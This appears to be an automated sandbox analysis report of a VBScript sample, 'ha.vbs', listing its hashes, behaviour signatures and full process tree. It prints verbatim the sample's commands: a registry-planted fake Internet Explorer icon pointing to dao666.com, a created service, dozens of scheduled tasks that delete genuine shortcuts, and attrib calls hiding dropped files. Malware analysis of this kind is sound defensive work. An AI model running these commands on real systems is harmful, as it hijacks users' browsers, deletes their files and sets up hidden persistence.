Analysis
-
max time kernel
120s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
25/12/2023, 19:56
General
-
Target
ha.vbs
-
Size
1KB
-
MD5
97b8dddd4361596cdeb6851a0639d834
-
SHA1
7f35a8018d53777c449b9703a867c0f41b542e62
-
SHA256
fa554b0be47bc18d0992bf700e8495ad29237d88413faac60cc1850a51dedb80
-
SHA512
d3103e2bd9c5e272ae7f80e27c62ca70ee06adb6b6c85b2c60f34e781ed54f140caa1cb4f0787256e4e66cd47dd4047cee0bb50a13bac581a05f47d904009f4b
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Deletes itself 1 IoCs
-
Registers COM server for autorun 1 TTPs 6 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 44 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ha.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?cn2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?cn3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2676 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd2⤵
-
C:\Windows\system32\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet start "Task Scheduler"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start "Task Scheduler"4⤵
-
-
-
C:\Windows\system32\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd2⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\360SE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\tool.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\360.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\361.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd2⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd2⤵
- Deletes itself
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567240c407312315393794e9b65d1e8e5
SHA1810b252670834678fdaa057b39e07985a029be7a
SHA2560a29a7d11891968f5a4a6eb615e87a428d5e93c9a48908c7a1de7cf5a40acf22
SHA512897bfb0b8b9ca3a315ff72b9c937aba50ddb88dd28ce3d8f156ccb01d008e566260e317364966fc3fe59a6f78017ad3924f32dd6d4b4a170550edc55b62bd3f2
-
Filesize
567B
MD5feb810eaa38eb0890ad2034d322e4c79
SHA1a7c7ddd0bd405b949ddbffed364269d145ee78e4
SHA256e346f4ed81e3e7974c4a9978789fc08737abc4c7318f31d747b1ad23ce5bf800
SHA512f96b5e8129ab8fd4703a2e4bddf4245e9c4a64a8d69663f755386021cb8fd34a75bd0fa53b4579145bf50be2948d9ae5d0f4bdb556ae73b4cc85e6a2130f5ab9
-
Filesize
3KB
MD5d7eece295819ac643894e11ec290fc16
SHA1eaf976563ab1d54ddbb538846f21d80663c0482b
SHA25600057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef
SHA51261602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036
-
Filesize
344B
MD549482322c8f6241ba8aca2ebf96e4dc9
SHA1d9f60cf9178389f30ddce9a76981b162c962d297
SHA256152aca1d1cbae3a4e1a5b4d4a1fcf8dbbf2412eafbda8d3655739c65785986e7
SHA51255e8947591714a634ad9c59263cf080b0e520aa943ec43fc4aff662b4703237cb2d35ad76ed5ab64335125c618a758dd313e0660e3709ece3c40e5b760db8e1c
-
Filesize
344B
MD5c9729cb243666180087ed4cbcb66f486
SHA14e2cd49a041369ad21aaa513bbfa2435e7ad169e
SHA2561a0863a597e0f898cbc2e5237af8d6c71d2391d852ee3c8a6b4d5415e4079862
SHA51289c8386645d245da94b6f9ee8389a6faea6867d132ba3f113cc0f8529e93abe8fa041b845cfb8b79b5945fc501833bcbdb96aca2bb27381096fd9394e77cd13e
-
Filesize
344B
MD5706cb1eecc91d1cce80d3827b6762d9e
SHA1eb02a7e4f0ef0eece43e9e46b5332bb7333794c2
SHA25687e4765c529f4c0ab41fed5d349dd89cbf0fe98459e6b6c5444758bc633c8381
SHA512c4a5f315e3b084b18bc43a01c4fefb8671dacfa49c8026355d828c58bf599c99950b423b946cb289dc7aa16c5ff337c0371301df01547deb925f722093d0f55d
-
Filesize
344B
MD5d72501fdf3512217a83f98f6359aceb6
SHA116edfc2375a1ad674ebf51fbacd437c5f307b6d4
SHA2565c33e185f4ad340e8e26e64eb0b50b917ad7c9aa80e04350cfc0618baa6e0144
